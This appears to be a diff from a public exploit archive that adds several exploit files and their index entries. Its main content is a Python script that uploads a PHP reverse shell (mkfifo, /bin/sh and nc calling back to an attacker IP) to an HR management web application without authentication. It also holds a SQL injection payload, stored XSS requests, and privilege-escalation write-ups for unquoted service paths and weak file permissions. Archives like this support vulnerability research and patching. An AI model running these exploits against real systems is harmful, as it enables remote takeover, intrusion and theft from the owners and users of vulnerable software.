# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
# --- Proof of concept --- #
#!/usr/bin/python3
import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
def file_upload(target_ip, attacker_ip, attacker_port):
random_number = str(random.randint(100000000,999999999))
file_name = random_number + "shell.php"
revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
m = MultipartEncoder(fields={'upload': '', 'per_file': (file_name, revshell_string, 'application/x-php')})
print("(+) Uploading php reverse shell file ..")
r1 = requests.post('http://{}/ProfilingSystem/add_file_query.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
if not "Sorry, there was an error uploading your file." in r1.text:
print("(+) File uploaded to: http://{}/ProfilingSystem/uploads/{}".format(target_ip,file_name))
return file_name
else:
print("(-) Oh noes, error occured while uploading the file.. quitting!")
exit()
def trigger_shell(target_ip, target_file_name):
url = 'http://{}/ProfilingSystem/uploads/{}'.format(target_ip, target_file_name)
print("(+) Now trying to trigger our shell..")
r2 = requests.get(url)
if r2.status_code != 200:
print("(-) Oh noes, we can't reach the uploaded file.. did it upload correctly?! Quitting!")
exit()
else:
return None
def main():
if len(sys.argv) != 4:
print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
sys.exit(-1)
print("--- Exploiting today: Profiling System for Human Resource Management 1.0 ---")
print("----------------------------------------------------------------------------")
target_ip = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]
target_file_name = file_upload(target_ip, attacker_ip, attacker_port)
trigger_shell(target_ip, target_file_name)
print("(+) done!")
if __name__ == "__main__":
main()

41
exploits/php/webapps/49687.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Online News Portal 1.0 - 'name' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Steps
# Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php
# Save request in BurpSuite
# Run saved request with sqlmap -r sql.txt
---
Parameter: MULTIPART name ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="name"
aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="category"
1
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="price"
asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="qty"
asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------15280280330873390203691218429--
---

115
exploits/php/webapps/49688.txt Normal file
View file

@ -0,0 +1,115 @@
# Exploit Title: Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Multipul endpoints on the application suffer from Stored XSS injection as a user/supplier and admin. Scripts execute on page load.
# One
POST /pos_inv/admin/addcustomer.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------26863080316712198253766739741
Content-Length: 661
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/customer.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="name"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="address"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="contact"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="username"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="password"
<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741--
# Two
http://127.0.0.1/pos_inv/admin/supplier.php
POST /pos_inv/admin/edit_supplier.php?id=4 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/supplier.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1
name=Dell+Computer+Corporation&address=%3Cscript%3Ealert%28%60Stored+XSS%60%29%3C%2Fscript%3E&contact=1-800-WWW-DELL&username=supplier&password=fa3ddb86f38fb6a8284636249f6551aa
# Three
http://127.0.0.1/pos_inv/admin/product.php
POST /pos_inv/admin/edit_product.php?id=12 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11435260685310908573266876009
Content-Length: 844
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/product.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="name"
ACER Aspire GX-781 Gaming PC <script>alert(1)</script>
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="category"
2
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="supplier"
0
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="price"
749.99
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="qty"
1000
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------11435260685310908573266876009--

36
exploits/windows/local/49671.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path
# Date: 2021-03-17
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://global.brother/
# Software Link: https://support.brother.com/g/b/downloadend.aspx?c=us&lang=en&prod=hls7000dn_us_eu_as&os=10013&dlid=dlf005042_000&flang=4&type3=26
# Version: 3.75.0000
# Tested on: Windows 10
# Source: https://docs.unsafe-inline.com/0day/bradmin-professional-3.75-unquoted-service-path
#Description:
This software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices.
If a user can insert a executable which is called as "BRAdmin" under the "C:\Program Files (x86)\Brother\" , local system privileges could be obtained by the user.
#Detection of unquoted service path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """
Brother BRAdminPro Scheduler
BRA_Scheduler
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
Auto
C:\>sc qc BRA_Scheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BRA_Scheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Brother BRAdminPro Scheduler
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

33
exploits/windows/local/49673.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path
# Discovery by: Riadh Bouchahoua
# Discovery Date: 19-03-2021
# Vendor Homepage: https://mosquitto.org/
# Software Links : https://mosquitto.org/download/
# Tested Version: 2.0.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits
# Step to discover Unquoted Service Path:
====
C:\Users\Admin>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr "mosquitto"
mosquitto C:\Program Files\mosquitto\mosquitto.exe run
====
C:\Users\Admin>sc qc mosquitto
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: mosquitto
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\mosquitto\mosquitto.exe run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Mosquitto Broker
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

48
exploits/windows/local/49678.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: SOYAL 701 Server 9.0.1 - Insecure Permissions
# Date: 25.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: 9.0.1 190322
8.0.6 181227
Summary: 701 Server is the program used to set up and configure LAN
and IP based access control systems, from the COM port used to the
quantity and type of controllers connected. It is also used for
programming some of the more complex controllers such as the AR-716E
and the AR-829E.
Desc: The application suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'F' flag (Full) for 'Everyone'
and 'Authenticated Users' group.
Tested on: Microsoft Windows 10 Enterprise
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5633
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5633.php
25.01.2021
--
C:\Program Files (x86)\701Server>cacls McuServer.exe
C:\Program Files (x86)\701Server\McuServer.exe Everyone:F
NT AUTHORITY\Authenticated Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
C:\Program Files (x86)\701Server>

48
exploits/windows/local/49679.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: SOYAL 701 Client 9.0.1 - Insecure Permissions
# Date: 25.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: 9.0.1 190410
9.0.1 190115
Summary: 701 Client is the user interface software for the access control
system. It is used for adding and deleting tokens, setting door groups
for access, setting time zones for limiting access and monitoring ingress
and egress on a live system, among other things.
Desc: The application suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'F' flag (Full) for 'Authenticated Users'
group.
Tested on: Microsoft Windows 10 Enterprise
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5634
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5634.php
25.01.2021
--
C:\Program Files (x86)\701Client>cacls client.exe
C:\Program Files (x86)\701Client\client.exe NT AUTHORITY\Authenticated Users:F
NT AUTHORITY\Authenticated Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
C:\Program Files (x86)\701Client>

20
files_exploits.csv
View file

@ -6774,6 +6774,7 @@ id,file,description,date,author,type,platform,port
49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11292,6 +11293,10 @@ id,file,description,date,author,type,platform,port
49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows,
49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",2021-03-18,"Mohammed Alshehri",local,windows,
49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",2021-03-19,"Metin Yunus Kandemir",local,windows,
49673,exploits/windows/local/49673.txt,"Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path",2021-03-19,"Riadh Bouchahoua",local,windows,
49678,exploits/windows/local/49678.txt,"SOYAL 701 Server 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,
49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18413,6 +18418,7 @@ id,file,description,date,author,type,platform,port
49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java,
49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows,
49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-14,F5,remote,windows,
49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",2021-03-19,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -43850,4 +43856,18 @@ id,file,description,date,author,type,platform,port
49662,exploits/multiple/webapps/49662.txt,"VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS",2021-03-18,"numan türle",webapps,multiple,
49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection",2021-03-18,"Piyush Patil",webapps,php,
49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php,
49668,exploits/multiple/webapps/49668.txt,"Plone CMS 5.2.3 - 'Title' Stored XSS",2021-03-19,"Piyush Patil",webapps,multiple,
49669,exploits/php/webapps/49669.txt,"LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS",2021-03-19,"Clément Cruchet",webapps,php,
49670,exploits/php/webapps/49670.txt,"Boonex Dolphin 7.4.2 - 'width' Stored XSS",2021-03-19,"Piyush Patil",webapps,php,
49672,exploits/php/webapps/49672.py,"Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)",2021-03-19,"Christian Vierschilling",webapps,php,
49674,exploits/multiple/webapps/49674.txt,"VestaCP 0.9.8 - 'v_sftp_licence' Command Injection",2021-03-19,"numan türle",webapps,multiple,
49676,exploits/hardware/webapps/49676.txt,"SOYAL Biometric Access Control System 5.0 - Master Code Disclosure",2021-03-19,LiquidWorm,webapps,hardware,
49677,exploits/hardware/webapps/49677.html,"SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF",2021-03-19,LiquidWorm,webapps,hardware,
49680,exploits/hardware/webapps/49680.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)",2021-03-19,LiquidWorm,webapps,hardware,
49681,exploits/hardware/webapps/49681.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass",2021-03-19,LiquidWorm,webapps,hardware,
49683,exploits/hardware/webapps/49683.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution",2021-03-19,LiquidWorm,webapps,hardware,
49684,exploits/hardware/webapps/49684.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)",2021-03-19,LiquidWorm,webapps,hardware,
49686,exploits/hardware/webapps/49686.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)",2021-03-19,LiquidWorm,webapps,hardware,
49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",2021-03-19,"Richard Jones",webapps,php,
49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",2021-03-19,"Richard Jones",webapps,php,
49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,

Can't render this file because it is too large.